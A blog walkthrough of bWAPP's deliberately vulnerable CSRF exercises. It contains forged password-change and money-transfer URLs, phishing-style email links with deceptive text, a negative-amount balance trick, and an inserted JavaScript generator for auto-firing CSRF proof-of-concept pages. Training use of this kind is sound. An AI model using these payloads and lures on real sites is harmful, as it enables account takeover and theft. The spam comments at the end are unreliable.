
Tuesday, January 14, 2014

bWAPP Cross-Site Request Forgery (CSRF)

bWAPP, or buggy web application, is a deliberately insecure web application.
bWAPP helps security enthusiasts, developers and students to discover and prevent web vulnerabilities. It prepares you to conduct successful penetration testing and ethical hacking projects. It is for educational purposes only.

What makes bWAPP so unique? Well, it has over 60 web bugs!
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.

You can download bWAPP from here. Have fun!
It's also possible to download our bee-box, a custom Linux VM pre-installed with bWAPP.

Cross-Site Request Forgery (CSRF)

Parts 1-3 (security level: Low)

CSRF (Password)

CSRF (Transfer Amount)

CSRF (Secret)

CSRF (Password)

This page lets us change the password of the logged-in user. Let's give it a try.

After submitting the form, the request shows up in the browser's address bar. The form is sent with GET, so every parameter is visible in the URL:

http://192.168.178.22/bWAPP/csrf_1.php?password_new=lol&password_conf=lol&action=change

password_new=lol

password_conf=lol

action=change

Note what is missing: there is no anti-CSRF token and no other secret that an attacker could not guess. The only thing that authenticates the request is the session cookie, which the browser attaches automatically. So with a little social engineering you can trick a logged-in user into opening your link with a new password of your choice in it, and the password is changed as soon as the link is loaded.

Example:

Cr4shy must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:

<a href="http://192.168.178.22/bWAPP/csrf_1.php?password_new=lol&password_conf=lol&action=change">Warning Please Read : Dont change your Password!</a>

Alice clicks the link and her password is changed to lol.
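To show why the victim does not even have to click, here is an added example (my own code, not from the original post or from bWAPP) that generates a CSRF proof-of-concept page for the request above. Loading the page fires the GET request from a zero-size image and the browser attaches the bWAPP session cookie by itself; a second variant submits a hidden form on load for the case where an application only accepts POST. The host, path and parameter names are the ones from the URL above; the page layout and the escaping are this example's own assumptions about how such a page is normally built.

```javascript
// Added example, not code from the original post or from bWAPP.
// Generates CSRF proof-of-concept pages for the bWAPP password-change request.
// Target and parameter names come from the URL in the post; everything else
// (page layout, escaping) is this example's own choice.

// Escape text for use inside an HTML attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// Encode parameters as application/x-www-form-urlencoded.
function buildQuery(params) {
  return Object.entries(params)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join('&');
}

// GET variant: a 0x0 image whose src is the forged request. The browser loads
// it as soon as the page renders and sends the victim's session cookie with it.
function buildGetPoC(action, params) {
  const url = `${action}?${buildQuery(params)}`;
  return '<!DOCTYPE html>\n<html><body>\n' +
    '<p>Please wait...</p>\n' +
    `<img src="${escapeHtml(url)}" width="0" height="0" alt="">\n` +
    '</body></html>\n';
}

// POST variant: a hidden form that submits itself on load. bWAPP at security
// level "low" also accepts GET, but many targets only honour POST, and a
// form submission is still a normal, cookie-bearing browser request.
function buildPostPoC(action, params) {
  const inputs = Object.entries(params)
    .map(([k, v]) => `<input type="hidden" name="${escapeHtml(k)}" value="${escapeHtml(v)}">`)
    .join('\n    ');
  return '<!DOCTYPE html>\n<html><body onload="document.forms[0].submit()">\n' +
    `  <form method="POST" action="${escapeHtml(action)}">\n    ${inputs}\n  </form>\n` +
    '</body></html>\n';
}

// The request observed in the post.
const TARGET = 'http://192.168.178.22/bWAPP/csrf_1.php';
const PARAMS = { password_new: 'lol', password_conf: 'lol', action: 'change' };

console.log(buildGetPoC(TARGET, PARAMS));
```

Save the output as an HTML file, host it anywhere, and get the logged-in victim to open it: the password changes without a click. Note that the `&` in the query string is written as `&amp;` inside the attribute; the browser decodes it back before requesting the URL.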
CSRF (Transfer Amount)

This page gives us some money to play with:

Amount on your account: 1000 EUR

Account to transfer: 123-45678-90

Maybe vulnerable?

We transfer 100 EUR to Alice and it works: 900 EUR left. But I want more money, hmm.

Hmm, 900 EUR left. That sucks...

Maybe math can help us. The transfer form is submitted with GET too, so the parameters are right there in the URL:

http://192.168.178.22/bWAPP/csrf_2.php?account=123-45678-90&amount=0&action=transfer

account=123-45678-90

amount=0

action=transfer

What happens if we set amount=1000000 (one million)?

Ohhh nooooo!

Amount on your account: -999000 EUR

The transfer went through even though the account only held 1000 EUR: nothing checks that the balance covers the amount. But if a positive amount removes money from the account, a negative amount should add money to it, I hope. Let's try amount=-1000000 (the balance was back at 1000 EUR before this request).

Now we can stop working and go live in freedom and peace:

Amount on your account: 1001000 EUR

I don't need more.

Vuln 2:

The transfer request has the same problem as the password change, with an input-validation bug on top: there is no anti-CSRF token, the session cookie alone authenticates the request, the sign of the amount is never checked, and the balance is allowed to go negative. With some social engineering you can trick the user into clicking your link with the amount of money to transfer. After the user clicks the link, they can say goodbye to their money.

Example:

Cr4shy must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following:

<a href="http://192.168.178.22/bWAPP/csrf_2.php?account=123-45678-90&amount=1000000&action=transfer">Warning Please Read : You got Hacked please change your Password fast!</a>

Alice clicks the link, 1000000 EUR leaves her account for 123-45678-90, and it's bye bye to Alice's money.


CSRF (Secret)

Maybe later.

6 comments:

  1. I can't find the screenshot. Can you please update with the screenshot?

  2. Request you to do it ASAP, please.

  3. The screenshots are all dead :/
    A nice guide, but a bit basic... Maybe enhance it by adding permission escalation CSRF :)

  4. I've been using Kaspersky security for many years now, and I'd recommend this product to all of you.

  5. Very nice, I like the way you explained it. I also wrote something along similar lines on what we need to know about CSRF.

    Cross site request forgery csrf

  6. You can earn $20 for filling a 20 minute survey!

    Guess what? This is exactly what large companies are paying for. They need to know what their average customer needs and wants. So large companies pay millions of dollars per month to the average person. In return, the average person, like me, fills out surveys and gives them their opinion.


[#] iNFO [#]

All the information provided on this site is for educational purposes only.

The site and its author are in no way responsible for any misuse of the information.

©2012 Security is just an Illusion. Powered by Blogger.